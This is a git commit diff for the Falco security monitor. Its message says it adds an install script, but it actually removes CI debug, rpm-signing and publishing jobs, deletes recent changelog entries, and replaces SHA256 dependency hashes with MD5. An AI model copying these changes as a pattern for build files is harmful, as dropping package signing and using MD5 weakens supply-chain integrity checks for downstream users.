Adding falco script from install docs

Signed-off-by: Kris Nova <kris@nivenly.com>

.circleci/config.yml

@@ -32,38 +32,6 @@ jobs:
             pushd build
             make tests
             popd
-  # Debug build using ubuntu LTS
-  # This build is dynamic, most dependencies are taken from the OS
-  "build/ubuntu-bionic-debug":
-    docker:
-      - image: ubuntu:bionic
-    steps:
-      - checkout
-      - run:
-          name: Update base image
-          command: apt update -y
-      - run:
-          name: Install dependencies
-          command: apt install libssl-dev libyaml-dev libncurses-dev libc-ares-dev libprotobuf-dev protobuf-compiler libjq-dev libyaml-cpp-dev libgrpc++-dev protobuf-compiler-grpc rpm linux-headers-$(uname -r) libelf-dev cmake build-essential libcurl4-openssl-dev -y
-      - run:
-          name: Prepare project
-          command: |
-            mkdir build
-            pushd build
-            cmake -DCMAKE_BUILD_TYPE=debug ..
-            popd
-      - run:
-          name: Build
-          command: |
-            pushd build
-            make -j4 all
-            popd
-      - run:
-          name: Run unit tests
-          command: |
-            pushd build
-            make tests
-            popd
   # Build using our own builder base image using centos 7
   # This build is static, dependencies are bundled in the falco binary
   "build/centos7":
@@ -101,28 +69,6 @@ jobs:
       - store_artifacts:
           path: /tmp/packages
           destination: /packages
-  # Debug build using our own builder base image using centos 7
-  # This build is static, dependencies are bundled in the falco binary
-  "build/centos7-debug":
-    docker:
-      - image: falcosecurity/falco-builder:latest
-        environment:
-          BUILD_TYPE: "debug"
-    steps:
-      - checkout:
-          path: /source/falco
-      - run:
-          name: Prepare project
-          command: /usr/bin/entrypoint cmake
-      - run:
-          name: Build
-          command: /usr/bin/entrypoint all
-      - run:
-          name: Run unit tests
-          command: /usr/bin/entrypoint tests
-      - run:
-          name: Build packages
-          command: /usr/bin/entrypoint package
   # Execute integration tests based on the build results coming from the "build/centos7" job
   "tests/integration":
     docker:
@@ -138,229 +84,12 @@ jobs:
       - run:
           name: Execute integration tests
           command: /usr/bin/entrypoint test
-  # Sign rpm packages
-  "rpm/sign":
-    docker:
-      - image: falcosecurity/falco-builder:latest
-    steps:
-      - attach_workspace:
-          at: /
-      - run:
-          name: Install rpmsign
-          command: |
-            yum update -y
-            yum install rpm-sign -y
-      - run:
-          name: Sign rpm
-          command: |
-            echo "%_signature gpg" > ~/.rpmmacros
-            echo "%_gpg_name  Falcosecurity Package Signing" >> ~/.rpmmacros
-            cd /build/release/
-            echo '#!/usr/bin/expect -f' > sign
-            echo 'spawn rpmsign --addsign {*}$argv' >> sign
-            echo 'expect -exact "Enter pass phrase: "' >> sign
-            echo 'send -- "\n"' >> sign
-            echo 'expect eof' >> sign
-            chmod +x sign
-            echo $GPG_KEY | base64 -d | gpg --import
-            ./sign *.rpm
-            test "$(rpm -qpi *.rpm | awk '/Signature/' | grep -i none | wc -l)" -eq 0
-      - persist_to_workspace:
-          root: /
-          paths:
-            - build/release/*.rpm
-  # Publish the packages
-  "publish/packages-dev":
-    docker:
-      - image: docker.bintray.io/jfrog/jfrog-cli-go:latest
-    steps:
-      - attach_workspace:
-          at: /
-      - run:
-          name: Create versions
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt vs falcosecurity/deb-dev/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/deb-dev/falco/${FALCO_VERSION} --desc="Falco (master)" --github-rel-notes=CHANGELOG.md --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_SHA1} --user poiana --key ${BINTRAY_SECRET}
-            jfrog bt vs falcosecurity/rpm-dev/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/rpm-dev/falco/${FALCO_VERSION} --desc="Falco (master)" --github-rel-notes=CHANGELOG.md --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_SHA1} --user poiana --key ${BINTRAY_SECRET}
-            jfrog bt vs falcosecurity/bin-dev/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/bin-dev/falco/${FALCO_VERSION} --desc="Falco (master)" --github-rel-notes=CHANGELOG.md --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_SHA1} --user poiana --key ${BINTRAY_SECRET}
-      - run:
-          name: Publish deb-dev
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.deb falcosecurity/deb-dev/falco/${FALCO_VERSION} stable/ --deb stable/main/amd64 --user poiana --key ${BINTRAY_SECRET} --publish --override
-      - run:
-          name: Publish rpm-dev
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.rpm falcosecurity/rpm-dev/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} --publish --override
-      - run:
-          name: Publish tgz-dev
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.tar.gz falcosecurity/bin-dev/falco/${FALCO_VERSION} x86_64/ --user poiana --key ${BINTRAY_SECRET} --publish --override
-  # Publish docker packages
-  "publish/docker-dev":
-    docker:
-      - image: docker:stable
-    steps:
-      - attach_workspace:
-          at: /
-      - checkout
-      - setup_remote_docker
-      - run:
-          name: Build and publish slim-dev
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            docker build --build-arg VERSION_BUCKET=deb-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:master-slim docker/slim
-            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
-            docker push falcosecurity/falco:master-slim
-      - run:
-          name: Build and publish minimal-dev
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            docker build --build-arg VERSION_BUCKET=bin-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:master-minimal docker/minimal
-            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
-            docker push falcosecurity/falco:master-minimal
-      - run:
-          name: Build and publish dev
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            docker build --build-arg VERSION_BUCKET=deb-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:master docker/stable
-            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
-            docker push falcosecurity/falco:master
-  # Publish the packages
-  "publish/packages":
-    docker:
-      - image: docker.bintray.io/jfrog/jfrog-cli-go:latest
-    steps:
-      - attach_workspace:
-          at: /
-      - run:
-          name: Create versions
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt vs falcosecurity/deb/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/deb/falco/${FALCO_VERSION} --desc="Falco (${CIRCLE_TAG})" --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_TAG} --user poiana --key ${BINTRAY_SECRET}
-            jfrog bt vs falcosecurity/rpm/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/rpm/falco/${FALCO_VERSION} --desc="Falco (${CIRCLE_TAG})" --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_TAG} --user poiana --key ${BINTRAY_SECRET}
-            jfrog bt vs falcosecurity/bin/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/bin/falco/${FALCO_VERSION} --desc="Falco (${CIRCLE_TAG})" --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_TAG} --user poiana --key ${BINTRAY_SECRET}
-      - run:
-          name: Publish deb
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.deb falcosecurity/deb/falco/${FALCO_VERSION} stable/ --deb stable/main/amd64 --user poiana --key ${BINTRAY_SECRET} --publish --override
-      - run:
-          name: Publish rpm
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.rpm falcosecurity/rpm/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} --publish --override
-      - run:
-          name: Publish tgz
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.tar.gz falcosecurity/bin/falco/${FALCO_VERSION} x86_64/ --user poiana --key ${BINTRAY_SECRET} --publish --override
-  # Publish docker packages
-  "publish/docker":
-    docker:
-      - image: docker:stable
-    steps:
-      - attach_workspace:
-          at: /
-      - checkout
-      - setup_remote_docker
-      - run:
-          name: Build and publish slim
-          command: |
-            docker build --build-arg VERSION_BUCKET=deb --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "falcosecurity/falco:${CIRCLE_TAG}-slim" docker/slim
-            docker tag "falcosecurity/falco:${CIRCLE_TAG}-slim" falcosecurity/falco:latest-slim
-            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
-            docker push "falcosecurity/falco:${CIRCLE_TAG}-slim"
-            docker push "falcosecurity/falco:latest-slim"
-      - run:
-          name: Build and publish minimal
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            docker build --build-arg VERSION_BUCKET=bin --build-arg FALCO_VERSION=${FALCO_VERSION} -t "falcosecurity/falco:${CIRCLE_TAG}-minimal" docker/minimal
-            docker tag "falcosecurity/falco:${CIRCLE_TAG}-minimal" falcosecurity/falco:latest-minimal
-            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
-            docker push "falcosecurity/falco:${CIRCLE_TAG}-minimal"
-            docker push "falcosecurity/falco:latest-minimal"
-      - run:
-          name: Build and publish stable
-          command: |
-            docker build --build-arg VERSION_BUCKET=deb --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "falcosecurity/falco:${CIRCLE_TAG}" docker/stable
-            docker tag "falcosecurity/falco:${CIRCLE_TAG}" falcosecurity/falco:latest
-            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
-            docker push "falcosecurity/falco:${CIRCLE_TAG}"
-            docker push "falcosecurity/falco:latest"
 workflows:
   version: 2
   build_and_test:
     jobs:
       - "build/ubuntu-bionic"
-      - "build/ubuntu-bionic-debug"
       - "build/centos7"
-      - "build/centos7-debug"
       - "tests/integration":
           requires:
             - "build/centos7"
-      - "rpm/sign":
-          context: falco
-          filters:
-            tags:
-              ignore: /.*/
-            branches:
-              only: master
-          requires:
-            - "tests/integration"
-      - "publish/packages-dev":
-          context: falco
-          filters:
-            tags:
-              ignore: /.*/
-            branches:
-              only: master
-          requires:
-            - "rpm/sign"
-      - "publish/docker-dev":
-          context: falco
-          filters:
-            tags:
-              ignore: /.*/
-            branches:
-              only: master
-          requires:
-            - "publish/packages-dev"
-  release:
-    jobs:
-      - "build/centos7":
-          filters:
-            tags:
-              only: /.*/
-            branches:
-              ignore: /.*/
-      - "rpm/sign":
-          context: falco
-          requires:
-            - "build/centos7"
-          filters:
-            tags:
-              only: /.*/
-            branches:
-              ignore: /.*/
-      - "publish/packages":
-          context: falco
-          requires:
-            - "rpm/sign"
-          filters:
-            tags:
-              only: /.*/
-            branches:
-              ignore: /.*/
-      - "publish/docker":
-          context: falco
-          requires:
-            - "publish/packages"
-          filters:
-            tags:
-              only: /.*/
-            branches:
-              ignore: /.*/

.gitignore

@@ -16,6 +16,12 @@ userspace/falco/lua/lpeg.so
 userspace/engine/lua/lyaml
 userspace/engine/lua/lyaml.lua
 
+docker/event-generator/event_generator
+docker/event-generator/mysqld
+docker/event-generator/httpd
+docker/event-generator/sha1sum
+docker/event-generator/vipw
+
 .vscode/*
 
 .luacheckcache

CHANGELOG.md

@@ -2,138 +2,6 @@
 
 This file documents all notable changes to Falco. The release numbering uses [semantic versioning](http://semver.org).
 
-## v0.22.1
-
-Released on 2020-17-04
-
-### Major Changes
-
-* Same as v0.22.0
-
-### Minor Changes
-
-* Same as v0.22.0
-
-### Bug Fixes
-
-* fix: correct driver path (/usr/src/falco-%driver_version%) for RPM package [[#1148](https://github.com/falcosecurity/falco/pull/1148)]
-
-### Rule Changes
-
-* Same as v0.22.0
-
-## v0.22.0
-
-Released on 2020-16-04
-
-### Major Changes
-
-* new: falco version and driver version are distinct and not coupled anymore [[#1111](https://github.com/falcosecurity/falco/pull/1111)]
-* new: flag to disable asynchronous container metadata (CRI) fetch `--disable-cri-async` [[#1099](https://github.com/falcosecurity/falco/pull/1099)]
-
-
-### Minor Changes
-
-* docs(integrations): update API resource versions to Kubernetes 1.16 [[#1044](https://github.com/falcosecurity/falco/pull/1044)]
-* docs: add new release archive to the `README.md` [[#1098](https://github.com/falcosecurity/falco/pull/1098)]
-* update: driver version a259b4bf49c3 [[#1138](https://github.com/falcosecurity/falco/pull/1138)]
-* docs(integrations/k8s-using-daemonset): --cri flag correct socket path [[#1140](https://github.com/falcosecurity/falco/pull/1140)]
-* update: bump driver version to cd3d10123e [[#1131](https://github.com/falcosecurity/falco/pull/1131)]
-* update(docker): remove RHEL, kernel/linuxkit, and kernel/probeloader images [[#1124](https://github.com/falcosecurity/falco/pull/1124)]
-* update: falco-probe-loader script is falco-driver-loader now [[#1111](https://github.com/falcosecurity/falco/pull/1111)]
-* update: using only sha256 hashes when pulling build dependencies [[#1118](https://github.com/falcosecurity/falco/pull/1118)]
-
-
-### Bug Fixes
-
-* fix(integrations/k8s-using-daemonset): added missing privileges for the apps Kubernetes API group in the falco-cluster-role when using RBAC [[#1136](https://github.com/falcosecurity/falco/pull/1136)]
-* fix: connect to docker works also with libcurl >= 7.69.0 [[#1138](https://github.com/falcosecurity/falco/pull/1138)]
-* fix: HOST_ROOT environment variable detection [[#1133](https://github.com/falcosecurity/falco/pull/1133)]
-* fix(driver/bpf): stricter conditionals while dealing with strings [[#1131](https://github.com/falcosecurity/falco/pull/1131)]
-* fix: `/usr/bin/falco-${DRIVER_VERSION}` driver directory [[#1111](https://github.com/falcosecurity/falco/pull/1111)]
-* fix: FALCO_VERSION env variable inside Falco containers contains the Falco version now (not the docker image tag) [[#1111](https://github.com/falcosecurity/falco/pull/1111)]
-
-
-### Rule Changes
-
-* rule(macro user_expected_system_procs_network_activity_conditions): allow whitelisting system binaries using the network under specific conditions [[#1070](https://github.com/falcosecurity/falco/pull/1070)]
-* rule(Full K8s Administrative Access): detect any k8s operation by an administrator with full access [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
-* rule(Ingress Object without TLS Certificate Created): detect any attempt to create an ingress without TLS certification (rule enabled by default) [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
-* rule(Untrusted Node Successfully Joined the Cluster): detect a node successfully joined the cluster outside of the list of allowed nodes [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
-* rule(Untrusted Node Unsuccessfully Tried to Join the Cluster): detect an unsuccessful attempt to join the cluster for a node not in the list of allowed nodes [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
-* rule(Network Connection outside Local Subnet): detect traffic to image outside local subnet [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
-* rule(Outbound or Inbound Traffic not to Authorized Server Process and Port): detect traffic that is not to authorized server process and port [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
-* rule(Delete or rename shell history): "mitre_defense_evation" tag corrected to "mitre_defense_evasion" [[#1143](https://github.com/falcosecurity/falco/pull/1143)]
-* rule(Delete Bash History): "mitre_defense_evation" tag corrected to "mitre_defense_evasion" [[#1143](https://github.com/falcosecurity/falco/pull/1143)]
-* rule(Write below root): use pmatch to check against known root directories [[#1137](https://github.com/falcosecurity/falco/pull/1137)]
-* rule(Detect outbound connections to common miner pool ports): whitelist sysdig/agent and falcosecurity/falco for query miner domain dns [[#1115](https://github.com/falcosecurity/falco/pull/1115)]
-* rule(Service Account Created in Kube Namespace): only detect sa created in kube namespace with success [[#1117](https://github.com/falcosecurity/falco/pull/1117)]
-
-## v0.21.0
-
-Released on 2020-03-17
-
-### Major Changes
-
-* BREAKING CHANGE: the SYSDIG_BPF_PROBE environment variable is now just FALCO_BPF_PROBE (please update your systemd scripts or kubernetes deployments. [[#1050](https://github.com/falcosecurity/falco/pull/1050)]
-* new: automatically publish deb packages (from git master branch) to public dev repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* new: automatically publish rpm packages (from git master branch) to public dev repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* new: automatically release deb packages (from git tags) to public repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* new: automatically release rpm packages (from git tags) to public repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* new: automatically publish docker images from master (master, master-slim, master-minimal) [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* new: automatically publish docker images from git tag (tag, tag-slim, tag-master, latest, latest-slim, latest-minimal) [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* new: sign packages with falcosecurity gpg key [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-
-### Minor Changes
-
-* new: falco_version_prerelease contains the number of commits since last tag on the master [[#1086](https://github.com/falcosecurity/falco/pull/1086)]
-* docs: update branding [[#1074](https://github.com/falcosecurity/falco/pull/1074)]
-* new(docker/event-generator): add example k8s resource files that allow running the event generator in a k8s cluster. [[#1088](https://github.com/falcosecurity/falco/pull/1088)]
-* update: creating *-dev docker images using build arguments at build time [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* update: docker images use packages from the new repositories [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* update: docker image downloads old deb dependencies (gcc-6, gcc-5, binutils-2.30) from a new open repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-
-### Bug Fixes
-
-* fix(docker): updating `stable` and `local` images to run from `debian:stable` [[#1018](https://github.com/falcosecurity/falco/pull/1018)]
-* fix(event-generator): the image used by the event generator deployment to `latest`. [[#1091](https://github.com/falcosecurity/falco/pull/1091)]
-* fix: -t (to disable rules by certain tag) or -t (to only run rules with a certain tag) work now [[#1081](https://github.com/falcosecurity/falco/pull/1081)]
-* fix: the falco driver now compiles on >= 5.4 kernels [[#1080](https://github.com/falcosecurity/falco/pull/1080)]
-* fix: download falco packages which url contains character to encode - eg, `+` [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* fix(docker): use base name in docker-entrypoint.sh [[#981](https://github.com/falcosecurity/falco/pull/981)]
-
-### Rule Changes
-
-* rule(detect outbound connections to common miner pool ports): disabled by default [[#1061](https://github.com/falcosecurity/falco/pull/1061)]
-* rule(macro net_miner_pool): add localhost and rfc1918 addresses as exception in the rule. [[#1061](https://github.com/falcosecurity/falco/pull/1061)]
-* rule(change thread namespace): modify condition to detect suspicious container activity [[#974](https://github.com/falcosecurity/falco/pull/974)]
-
-## v0.20.0
-
-Released on 2020-02-24
-
-### Major Changes
-
-* fix: memory leak introduced in 0.18.0 happening while using json events and the kubernetes audit endpoint [[#1041](https://github.com/falcosecurity/falco/pull/1041)]
-* new: grpc version api [[#872](https://github.com/falcosecurity/falco/pull/872)]
-
-
-### Bug Fixes
-
-* fix: the base64 output format (-b) now works with both json and normal output. [[#1033](https://github.com/falcosecurity/falco/pull/1033)]
-* fix: version follows semver 2 bnf [[#872](https://github.com/falcosecurity/falco/pull/872)]
-
-### Rule Changes
-
-* rule(write below etc): add "dsc_host" as a ms oms program [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
-* rule(write below etc): let mcafee write to /etc/cma.d  [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
-* rule(write below etc): let avinetworks supervisor write some ssh cfg [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
-* rule(write below etc): alow writes to /etc/pki from openshift secrets dir [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
-* rule(write below root): let runc write to /exec.fifo [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
-* rule(change thread namespace): let cilium-cni change namespaces [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
-* rule(run shell untrusted): let puma reactor spawn shells [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
-
-
 ## v0.19.0
 
 Released on 2020-01-23
@@ -249,7 +117,7 @@ Released 2019-09-26
 
 * Same as v0.17.0
 
-### Minor Changes
+##
 
 * Same as v0.17.0
 

CMakeLists.txt

@@ -48,7 +48,6 @@ else()
   set(CMAKE_BUILD_TYPE "release")
   set(KBUILD_FLAGS "${DRAIOS_FEATURE_FLAGS}")
 endif()
-message(STATUS "Build type: ${CMAKE_BUILD_TYPE}")
 
 set(CMAKE_COMMON_FLAGS "-Wall -ggdb ${DRAIOS_FEATURE_FLAGS}")
 
@@ -71,9 +70,9 @@ set(CMAKE_CXX_FLAGS_RELEASE "-O3 -fno-strict-aliasing -DNDEBUG")
 include(GetFalcoVersion)
 
 set(PACKAGE_NAME "falco")
-set(PROBE_NAME "falco")
+set(PROBE_VERSION "${FALCO_VERSION}")
+set(PROBE_NAME "falco-probe")
 set(PROBE_DEVICE_NAME "falco")
-set(DRIVERS_REPO "https://dl.bintray.com/falcosecurity/driver")
 if(CMAKE_INSTALL_PREFIX_INITIALIZED_TO_DEFAULT)
   set(CMAKE_INSTALL_PREFIX
       /usr
@@ -94,7 +93,7 @@ set(NJSON_INCLUDE "${NJSON_SRC}/single_include")
 ExternalProject_Add(
   njson
   URL "https://s3.amazonaws.com/download.draios.com/dependencies/njson-3.3.0.tar.gz"
-  URL_HASH "SHA256=2fd1d207b4669a7843296c41d3b6ac5b23d00dec48dba507ba051d14564aa801"
+  URL_MD5 "e26760e848656a5da400662e6c5d999a"
   CONFIGURE_COMMAND ""
   BUILD_COMMAND ""
   INSTALL_COMMAND "")
@@ -113,7 +112,7 @@ set(B64_LIB "${B64_SRC}/src/libb64.a")
 ExternalProject_Add(
   b64
   URL "https://s3.amazonaws.com/download.draios.com/dependencies/libb64-1.2.src.zip"
-  URL_HASH "SHA256=343d8d61c5cbe3d3407394f16a5390c06f8ff907bd8d614c16546310b689bfd3"
+  URL_MD5 "a609809408327117e2c643bed91b76c5"
   CONFIGURE_COMMAND ""
   BUILD_COMMAND ${CMD_MAKE}
   BUILD_IN_SOURCE 1
@@ -136,7 +135,7 @@ set(LUAJIT_LIB "${LUAJIT_SRC}/libluajit.a")
 ExternalProject_Add(
   luajit
   URL "https://s3.amazonaws.com/download.draios.com/dependencies/LuaJIT-2.0.3.tar.gz"
-  URL_HASH "SHA256=55be6cb2d101ed38acca32c5b1f99ae345904b365b642203194c585d27bebd79"
+  URL_MD5 "f14e9104be513913810cd59c8c658dc0"
   CONFIGURE_COMMAND ""
   BUILD_COMMAND ${CMD_MAKE}
   BUILD_IN_SOURCE 1
@@ -152,7 +151,7 @@ ExternalProject_Add(
   lpeg
   DEPENDS ${LPEG_DEPENDENCIES}
   URL "https://s3.amazonaws.com/download.draios.com/dependencies/lpeg-1.0.0.tar.gz"
-  URL_HASH "SHA256=10190ae758a22a16415429a9eb70344cf29cbda738a6962a9f94a732340abf8e"
+  URL_MD5 "0aec64ccd13996202ad0c099e2877ece"
   BUILD_COMMAND LUA_INCLUDE=${LUAJIT_INCLUDE} "${PROJECT_SOURCE_DIR}/scripts/build-lpeg.sh" "${LPEG_SRC}/build"
   BUILD_IN_SOURCE 1
   CONFIGURE_COMMAND ""
@@ -176,14 +175,14 @@ ExternalProject_Add(
   lyaml
   DEPENDS ${LYAML_DEPENDENCIES}
   URL "https://s3.amazonaws.com/download.draios.com/dependencies/lyaml-release-v6.0.tar.gz"
-  URL_HASH "SHA256=9d7cf74d776999ff6f758c569d5202ff5da1f303c6f4229d3b41f71cd3a3e7a7"
+  URL_MD5 "dc3494689a0dce7cf44e7a99c72b1f30"
   BUILD_COMMAND ${CMD_MAKE}
   BUILD_IN_SOURCE 1
   CONFIGURE_COMMAND ./configure --enable-static LIBS=-lyaml LUA_INCLUDE=-I${LUAJIT_INCLUDE} LUA=${LUAJIT_SRC}/luajit
   INSTALL_COMMAND sh -c
                   "cp -R ${PROJECT_BINARY_DIR}/lyaml-prefix/src/lyaml/lib/* ${PROJECT_SOURCE_DIR}/userspace/engine/lua")
 
-# One TBB
+# Intel TBB
 set(TBB_SRC "${PROJECT_BINARY_DIR}/tbb-prefix/src/tbb")
 
 message(STATUS "Using bundled tbb in '${TBB_SRC}'")
@@ -192,8 +191,8 @@ set(TBB_INCLUDE_DIR "${TBB_SRC}/include/")
 set(TBB_LIB "${TBB_SRC}/build/lib_release/libtbb.a")
 ExternalProject_Add(
   tbb
-  URL "https://github.com/oneapi-src/oneTBB/archive/2018_U5.tar.gz"
-  URL_HASH "SHA256=b8dbab5aea2b70cf07844f86fa413e549e099aa3205b6a04059ca92ead93a372"
+  URL "https://github.com/intel/tbb/archive/2018_U5.tar.gz"
+  URL_MD5 "ff3ae09f8c23892fbc3008c39f78288f"
   CONFIGURE_COMMAND ""
   BUILD_COMMAND ${CMD_MAKE} tbb_build_dir=${TBB_SRC}/build tbb_build_prefix=lib extra_inc=big_iron.inc
   BUILD_IN_SOURCE 1
@@ -208,7 +207,7 @@ message(STATUS "Using bundled civetweb in '${CIVETWEB_SRC}'")
 ExternalProject_Add(
   civetweb
   URL "https://github.com/civetweb/civetweb/archive/v1.11.tar.gz"
-  URL_HASH "SHA256=de7d5e7a2d9551d325898c71e41d437d5f7b51e754b242af897f7be96e713a42"
+  URL_MD5 "b6d2175650a27924bccb747cbe084cd4"
   CONFIGURE_COMMAND ${CMAKE_COMMAND} -E make_directory ${CIVETWEB_SRC}/install/lib
   COMMAND ${CMAKE_COMMAND} -E make_directory ${CIVETWEB_SRC}/install/include
   BUILD_IN_SOURCE 1

README.md

@@ -5,18 +5,13 @@
 
 # The Falco Project
 
+#### Latest release
+
+**v0.19.0**
+Read the [change log](CHANGELOG.md)
+
 [![Build Status](https://img.shields.io/circleci/build/github/falcosecurity/falco/master?style=for-the-badge)](https://circleci.com/gh/falcosecurity/falco) [![CII Best Practices Summary](https://img.shields.io/cii/summary/2317?label=CCI%20Best%20Practices&style=for-the-badge)](https://bestpractices.coreinfrastructure.org/projects/2317) [![GitHub](https://img.shields.io/github/license/falcosecurity/falco?style=for-the-badge)](COPYING)
 
-#### Latest releases
-
-Read the [change log](CHANGELOG.md).
-
-|        | development                                                                                                                 | stable                                                                                                              |
-|--------|-----------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------|
-| rpm    | [![rpm-dev](https://img.shields.io/bintray/v/falcosecurity/rpm-dev/falco?label=Falco&color=%2300aec7&style=flat-square)][1] | [![rpm](https://img.shields.io/bintray/v/falcosecurity/rpm/falco?label=Falco&color=%23005763&style=flat-square)][2] |
-| deb    | [![deb-dev](https://img.shields.io/bintray/v/falcosecurity/deb-dev/falco?label=Falco&color=%2300aec7&style=flat-square)][3] | [![deb](https://img.shields.io/bintray/v/falcosecurity/deb/falco?label=Falco&color=%23005763&style=flat-square)][4] |
-| binary | [![bin-dev](https://img.shields.io/bintray/v/falcosecurity/bin-dev/falco?label=Falco&color=%2300aec7&style=flat-square)][5] | [![bin](https://img.shields.io/bintray/v/falcosecurity/bin/falco?label=Falco&color=%23005763&style=flat-square)][6] |
-
 ---
 
 Falco is a behavioral activity monitor designed to detect anomalous activity in your applications. Falco audits a system at the most fundamental level, the kernel. Falco then enriches this data with other input streams such as container runtime metrics, and Kubernetes metrics. Falco lets you continuously monitor and detect container, application, host, and network activity—all in one place—from one source of data, with one set of rules.
@@ -37,9 +32,7 @@ Falco can detect and alert on any behavior that involves making Linux system cal
 
 ### Installing Falco
 
-You can find the latest release downloads on the official [release archive](https://bintray.com/falcosecurity)
-
-Furthermore the comprehensive [installation guide](https://falco.org/docs/installation/) for Falco is available in the documentation website.
+A comprehensive [installation guide](https://falco.org/docs/installation/) for Falco is available in the documentation website.
 
 #### How do you compare Falco with other security tools?
 
@@ -75,10 +68,3 @@ A third party security audit was performed by Cure53, you can see the full repor
 
 ### Reporting security vulnerabilities
 Please report security vulnerabilities following the community process documented [here](https://github.com/falcosecurity/.github/blob/master/SECURITY.md).
-
